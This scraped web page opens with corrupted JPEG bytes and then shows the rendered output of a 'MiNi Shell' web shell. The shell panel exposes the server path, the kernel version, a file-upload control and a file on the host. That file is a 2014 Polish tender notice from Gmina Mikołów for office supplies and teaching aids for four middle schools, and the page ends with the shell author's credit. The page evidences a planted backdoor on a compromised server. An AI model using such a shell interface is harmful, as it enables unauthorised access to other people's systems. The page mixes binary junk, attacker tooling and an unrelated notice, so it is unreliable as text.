JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140930/206533-N-2014.html

<p class="kh_header"><b>Mikołów: Dostawa materiałów biurowych i eksploatacyjnych do zajęć oraz pomocy dydaktycznych dla czterech mikołowskich gimnazjów na potrzeby realizacji projektu Milion w rozumie

Część I:  Dostawa materiałów biurowych i eksploatacyjnych do zajęć dla czterech  mikołowskich gimnazjów na potrzeby realizacji projektu Milion w rozumie

Część II: Dostawa pomocy dydaktycznych do zajęć dla czterech mikołowskich gimnazjów na potrzeby realizacji projektu Milion w rozumie</b><br>
<b>Numer ogłoszenia: 206533 - 2014; data zamieszczenia: 30.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mikołów , Rynek 16, 43-190 Mikołów, woj. śląskie, tel. 32 3248500, faks 32 3248400.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i eksploatacyjnych do zajęć oraz pomocy dydaktycznych dla czterech mikołowskich gimnazjów na potrzeby realizacji projektu Milion w rozumie

Część I:  Dostawa materiałów biurowych i eksploatacyjnych do zajęć dla czterech  mikołowskich gimnazjów na potrzeby realizacji projektu Milion w rozumie

Część II: Dostawa pomocy dydaktycznych do zajęć dla czterech mikołowskich gimnazjów na potrzeby realizacji projektu Milion w rozumie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów biurowych i eksploatacyjnych do zajęć oraz pomocy dydaktycznych dla czterech mikołowskich gimnazjów na potrzeby realizacji projektu pn. Milion w rozumie. Część I. Dostawa materiałów biurowych i eksploatacyjnych do zajęć dla czterech mikołowskich gimnazjów: 1. Dostawa dla Gimnazjum nr 1 im. Powstańców Śląskich w Mikołowie, ul. Konstytucji 3 Maja 20, 43-190 Mikołów: Gilotyna do cięcia papieru - 2 szt., Papier ksero biały A3 - 8 ryz, Papier ksero kolor A3 - 2 ryzy, Papier ksero biały A4 - 60 ryz, Papier ksero kolor A4 - 20 ryz, Papier fotograficzny A4 - 5 opakowań, Papier wizytówkowy - 1 opakowanie, Obwoluta ofertowa - 6 opakowań, Teczka na dokumenty - 100 szt., Koszulka na dokumenty - 10 opakowań, Markery suchościeralne - 15 opakowań, Spinacze - 1 opakowanie, Pinezki - 20 opakowań, Karteczki samoprzylepne - 30 szt., Zszywacz biurowy - 5 szt., Rozszywacz - 5 szt., Marker - 8 szt., Nożyczki - 20 szt., Marker do płyt CD - 30 szt., Zszywacz długoramienny - 2 szt., Koperty C6 - 6 paczek, Koperty C5 - 2 paczki, Niszczarka do papieru - 2 szt., Celofan - 2 paczki, Gumka do gumowania - 30 szt., Gumki recepturki - 1 opakowanie, Skoroszyt wpinany do segregatora na dokumenty - 10 opakowań, Taśma dwustronna piankowa - 10 szt., Taśma klejąca - 30 szt., Klej specjalistyczny - 26 szt., Stojak na dokumenty - 4 szt., Sorter na dokumenty - 5 szt., Linijka - 5 szt., Segregator - 15 szt., Folia do laminowania - 3 paczki, Półka/ szuflada na dokumenty - 20 szt., Kalkulator - 2 szt., Koperty ozdobne perłowe - 2 opakowania, Sznurek - 10 szt., Serwetki kolorowe - 20 paczek, Deska/ podkładka z klipem - 12 szt., Wstążka satynowa - 48 rolek, Organtyna dekoracyjna błyszcząca - 36 rolek, Balony metaliczne - 3 paczki, Elektryczna pompka do balonów - 1 szt., Torby papierowe - 200 szt., Długopis automatyczny - 200 szt., Długopis żelowy - 400 szt., Toner do drukarki - 12 szt., Tusz do drukarki - 8 kompletów. 2. Dostawa dla Gimnazjum nr 2 im. Jerzego Kukuczki w Mikołowie, ul. Krakowska 30, 43-190 Mikołów: Papier ksero biały A4 - 80 ryz, Papier ksero biały A3 - 5 ryz, Papier ksero kolor A4 - 28 ryz, Papier fotograficzny A4 - 3 opakowania, Brystol - 3 opakowania, Blok techniczny biały A4 - 50 szt., Blok techniczny kolor A4 - 50 szt., Blok techniczny biały A3 -50 szt., Blok techniczny kolor A3 - 50 szt., Segregator - 20 szt., Skoroszyt wpinany do segregatora na dokumenty - 3 opakowania, Obwoluta ofertowa - 5 opakowań, Koszulka na dokumenty - 20 opakowań, Teczka na dokumenty - 30 szt., Teczka kartonowa na dokumenty - 50 szt., Pojemnik na karteczki z miejscem na długopis - 1 szt., Nieklejone karteczki w pojemniku - 1 szt., Notatnik kostka - 3 szt., Karteczki samoprzylepne - 32 szt., Zestaw etykiet w bloczku - 10 zestawów, Długopis automatyczny - 90 szt., Długopis żelowy - 60 szt., Marker - 40, szt., Mazaki/ pisaki - 10 szt., Marker do płyt CD - 4 szt., Markery suchościeralne - 10 opakowań, Tekstmarker - 40 szt., Farby plakatowe - 10 szt., Farby akwarelowe - 10 szt., Pędzle szkolne - 20 szt., Kredki ołówkowe - 10 szt., Kredki akwarelowe - 3 szt., Pastele olejne - 3 szt., Pastele suche - 3 szt., Ołówki drewniane - 100 szt., Gumka do gumowania - 50 szt., Temperówka - 10 szt., Pinezki - 2 opakowania, Gumki recepturki - 1 opakowanie, Spinacze - 3 opakowania, Spinacze krzyżowe - 4 opakowania, Dziurkacz metalowy - 2 szt., Zszywacz biurowy - 5 szt., Zszywki - 50 opakowań, Plastelina - 10 opakowań, Taśma samoprzylepna - 120 szt., Rozszywacz - 2 szt., Klej w sztyfcie - 50 szt., Nożyczki - 30 szt., Płyty CD/ DVD-R - 50 szt., Flipchart - 3 szt., Blok do flipcharta - 6 szt., Kalkulator - 1 szt., Gilotyna do cięcia papieru - 1 szt., Rękawiczki lateksowe - 5 opakowań, Koperty C6 - 5 paczek, Koperty C5 - 5 paczek, Koperty C4 - 1 paczka, Kreda szkolna - 2 paczki, Tablica korkowa w ramie aluminiowej - 1 szt., Taśma samoprzylepna - 10 szt., Karteczki samoprzylepne - 16 szt. 3. Dostawa dla Gimnazjum nr 3 im. Jana Pawła II w Mikołowie, ul. Gliwicka 299, 43-190 Mikołów: Papier ksero biały A4 - 30 ryz, Pastele olejne - 15 szt., Pastele suche - 10 szt., Pastele do tkanin - 4 szt., Papier wycinankowy nabłyszczany - 30 opakowań, Klej specjalistyczny - 26 szt., Klej w sztyfcie - 20 szt., Blok techniczny biały A4 - 25 szt., Blok techniczny kolor A4 - 25 szt., Blok techniczny biały A3 - 25 szt., Blok techniczny kolor A3 - 25 szt., Farby plakatowe - 10 szt., Zestaw pędzli artystycznych - 5 szt., Pistolet do klejenia na gorąco - 3 szt., Klej termotopliwy - 2 opakowania, Marker - 80 szt., Mazaki dwustronne - 14 opakowań, Zakreślacz z płynnym tuszem - 48 szt., Pojemnik/ kosz składany - 9 szt., Markery suchościeralne - 2 opakowania, Długopis żelowy - 84 szt., Skoroszyt wpinany do segregatora na dokumenty - 8 opakowań, Długopis automatyczny kolor czarny - 48 szt, Długopis automatyczny kolor niebieski - 48 szt., Teczka na dokumenty z przegródkami - 9 szt., Korektor - 12 szt., Zszywki - 5 opakowań, Zakładki samoprzylepne - 9 szt., Taśma klejąca - 20 szt., Karteczki samoprzylepne - 20 szt., Spinacze - 10 opakowań, Taśma samoprzylepna - 16 szt., Brystol A4, kolor - 3 zestawy, Brystol A4, biały - 5 zestawów, Segregator ze sklejki - 4 szt., Obwoluta ofertowa - 4 opakowania, Tektura falista - 10 opakowań, Papier wizytówkowy - 1 opakowanie, Papier pakowy - 3 opakowania, Koszulka na dokumenty - 5 opakowań, Segregator - 9 szt., Bibuła karbowana -3 opakowania, Zestaw do bindowania grzbietem plastikowym - 1 szt., Papier fotograficzny - 5 szt., Folia do laminarki - 3 opakowania, Toner do drukarki - 2 szt., Tusz do drukarki - 7 kompletów, Toner do drukarki - 1 komplet. 4. Dostawa dla Gimnazjum nr 4 w Mikołowie, ul. Szkolna 1, 43-190 Mikołów: Nożyczki - 30 szt., Klej - 3 szt., Papier ksero biały A4 - 40 ryz, Papier ksero biały A3 - 2 ryzy, Papier ksero kolor A4 - 10 ryz, Papier ksero kolor A3 - 2 ryzy, Brystol biały A3 - 3 opakowania, Brystol kolor A4 - 3 opakowania, Papier wycinankowy nabłyszczany - 3 opakowania, Tektura falista z brokatem - 2 opakowania, Papier szary - 40 opakowań, Tektura falista - 1 opakowanie, Papier pakowy - 20 opakowań, Kółka do origami - 1 zestaw, Kwadraty do origami - 1 zestaw, Zszywacz biurowy - 10 szt., Klej w sztyfcie - 20 szt., Sznurek - 2 szt., Bibuła karbowana - 5 opakowań, Dziurkacz metalowy - 5 szt., Cyrkiel - 30 szt., Flamaster artystyczny - 5 szt., Płyty CD - 100 szt., Blok akwarelowy - 5 szt., Blok akwarelowy - 10 szt., Skoroszyt wpinany do segregatora na dokumenty - 1 opakowanie, Koszulka na dokumenty - 5 opakowań, Obwoluta ofertowa - 5 opakowań, Obwoluta ofertowa - 5 opakowań, Blok techniczny - 10 szt., Kalkulator - 5 szt., Farby plakatowe - 5 opakowań, Pędzle szkolne - 5 szt., Długopis automatyczny - 10 szt., Kredki ołówkowe - 5 szt., Pastele suche - 10 szt., Segregator - 6 szt., Taśma klejąca - 21 szt., Taśma samoprzylepna - 6 szt., Pinezki - 10 opakowań, Markery suchościeralne - 9 opakowań, Bibuła karbowana - 1 opakowanie, Tusz do drukarki - 4 komplety, Blok do flipcharta - 3 szt., Zszywki - 30 opakowań. Część II. Dostawa pomocy dydaktycznych do zajęć dla czterech mikołowskich gimnazjów: 1. Dostawa dla Gimnazjum nr 1 im. Powstańców Śląskich w Mikołowie, ul. Konstytucji 3 Maja 20, 43-190 Mikołów: Łańcuch świetlny LED - 8 szt., Aparat cyfrowy-1 szt., Antyramy - 20 szt., Flaga Unii Europejskiej - 3 szt., Program interaktywny - 6 szt., Kosz do segregacji wewnętrznej odpadów - 9 szt., Książki - 20 szt., Słownik angielsko- polski polsko- angielski - 10 szt., Słownik niemiecko- polski polsko- niemiecki - 10 szt., Słuchawki nauszne - 10 szt., Głośniki do komputera - 15 szt., Mysz bezprzewodowa - 10 szt., Mapa fizyczna świata - 3 szt., Mapa Niemiec - 2 szt., Mapa Francji - 1 szt., Globus fizyczny podświetlany - 2 szt., Klawiatura bezprzewodowa - 4 szt., Ebooki - 30 szt., Czytnik audiobook - 10 szt., Lupa podświetlana na statywie - 1 szt., Tablica zielona - 3 szt., Tablica biała - 3 szt., Probówki chemiczne - 2 komplety, Lupa szklana - 20 szt., Model czaszki dorosłego człowieka - 1 szt., Zestaw preparatów biologicznych - 1 szt., Wahadło matematyczne - 1 szt., Przyrząd do demonstracji pola magnetycznego w przestrzeni - 1 szt., Lustro fenickie - 1 szt., Bryły nieregularne - 1 zestaw, Bryły obrotowe - 1 zestaw, Bryły prawidłowe - 1 zestaw, Bryły wpisane - 1 zestaw, Bryły ścięte - 1 zestaw, Cyrkiel tablicowy - 2 szt., Godło Polski - 10 szt. 2. Dostawa dla Gimnazjum nr 2 im. Jerzego Kukuczki w Mikołowie, ul. Krakowska 30, 43-190 Mikołów: Dyktafon cyfrowy - 1 szt., Gra planszowa - 2 szt., Program edukacyjno-terapeutyczny - 4 szt., Gra edukacyjna - 6 szt., Komplet trzech podstawowych brył szkieletowych - 1 szt., Magnetyczna  nakładka  na tablicę - układ współrzędnych - 2 szt., Tangram tablicowy magnetyczny - 1 szt., Naczynia połączone włoskowate - 2 szt., Elektrofor - 2 szt., Elektroskop - 2 szt., Plansze dydaktyczne - Wiedza o społeczeństwie - 1 zestaw, Mapa Unii Europejskiej - 1 szt., Film edukacyjny - 5 szt., Film edukacyjny - 1 zestaw, Urządzenie wielofunkcyjne - 1 szt., Tusz do drukarki - 4 komplety, Plansze interaktywne z geografii - 1 szt. 3. Dostawa dla Gimnazjum nr 3 im. Jana Pawła II w Mikołowie, ul. Gliwicka 299,  43-190 Mikołów: Szkiełka nakrywane mikroskopowe - 5 zestawów, Plansze interaktywne - język angielski - 1 szt., Słownik angielsko-polski polsko-angielski + CD - 2 szt., Gra gramatyczna - język angielski - 1 szt., Plansze interaktywne - informatyka - 1 szt., Ramka zatrzaskowa - 8 szt., Kurs multimedialny przygotowujący do egzaminu międzynarodowego z informatyki - 1 szt., Tablet + etui z klawiaturą - 5 szt., Gra planszowa logiczna i edukacyjna - 1 szt., Gra planszowa ekonomiczna - 1 szt., Forma silikonowa - 1 szt., Gumki do form silikonowych - 1 opakowanie, Gips - 3 opakowania, Kalkulator graficzny - 1 szt., Bindownica + zestaw startowy do bindowania - 1 szt., Pendrive - 5 szt. 4. Dostawa dla Gimnazjum nr 4 w Mikołowie, ul. Szkolna 1, 43-190 Mikołów: Atlas geograficzny - 3 szt., Cyrkiel tablicowy - 2 szt., Bryły z siatkami do rozkładania - 1 zestaw, Bryły obrotowe - 1 zestaw, Bryły prawidłowe - 1 zestaw, Bryły wpisane - 1 zestaw, Magnetyczne koła ułamkowe - 1 zestaw, Lampka spirytusowa - 3 szt., Paski wskaźnikowe - 2 szt., Pojemnik teleskopowy - 2 szt., Binokular - 2 szt., Lampa czuła na dźwięk - 1 szt., Zestaw narzędzi do przygotowywania preparatów - 4 zestawy, Szkiełka nakrywane mikroskopowe - 2 zestawy, Gra edukacyjna - 2 szt., Kostka zachęcająca do mówienia po angielsku - 1 szt., Mikrofon do zajęć językowych - 1 szt., Flipchart - 1 szt., Miernik pH - 1 szt.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 39.16.21.00-6, 38.00.00.00-5, 31.00.00.00-6, 31.10.00.00-0, 22.10.00.00-1, 37.00.00.00-8, 48.19.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium
dla części I zamówienia w wysokości:  950,00 zł (słownie: dziewięćset pięćdziesiąt  złotych) 
dla części II zamówienia w wysokości:  650,00 zł (słownie: sześćset pięćdziesiąt złotych) 
nie później niż do upływu terminu składania ofert, w formach o jakich mowa w art. 45 ust. 6 ustawy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Urzędu Miasta: 
Mikołowski Bank Spółdzielczy w Mikołowie
Nr 65 84360003 0000 0000 0071 0042 
Pozostałe formy wadium, o których mowa w art. 45 ust. 6 pkt. 2-5 ustawy, należy złożyć w oryginale do depozytu w kasie Urzędu Miasta, pokój nr 1, w wysokości stanowiącej równowartość powyższej kwoty, nie później niż do upływu terminu składania ofert. 
Wadium w formie niepieniężnej musi zawierać bezwarunkowe zobowiązanie Gwaranta do zapłaty kwoty gwarancji na pierwsze pisemne żądanie zamawiającego, o ile zaistnieje  którakolwiek z okoliczności wskazanych w art. 46 ust. 4a lub ust. 5 ustawy. W przypadku załączenia oryginału wadium w postaci niepieniężnej do oferty zamawiający uzna, że termin wniesienia wadium został dotrzymany. Zamawiający nie jest zobowiązany do udowodnienia, że nieskuteczność wezwania, o którym mowa w art. 26 ust. 3 cyt. ustawy, wynikła z przyczyn leżących lub nie leżących po stronie wykonawcy.
Za skutecznie wniesione wadium w pieniądzu uważa się wadium znajdujące się /zaksięgowane/ do upływu terminu składania ofert na rachunku Zamawiającego. 
W przypadku uchybienia temu terminowi zamawiający uzna, że wadium nie zostało skutecznie wniesione. W treści przelewu bankowego lub gwarancji należy zamieścić informację o numerze postępowania i nazwie postępowania. O ile wnoszący wadium nie jest podmiotem, który składa ofertę należy w treści przelewu lub gwarancji wskazać na rzecz kogo wadium zostaje wniesione. W przypadku braku możliwości ustalenia, w czyim imieniu zostało wniesione wadium lub jakiego postępowania dotyczy, skutkować to będzie wykluczeniem wykonawcy z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mikolow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Mikołowa, Rynek 16, 43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2014 godzina 13:00, miejsce: Urząd Miasta Mikołowa, Rynek 16, 43-190 Mikołów, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki:
Priorytet IX - Rozwój wykształcenia i kompetencji w regionach
Działanie 9.1 - Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty
Poddziałanie 9.1.2. - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com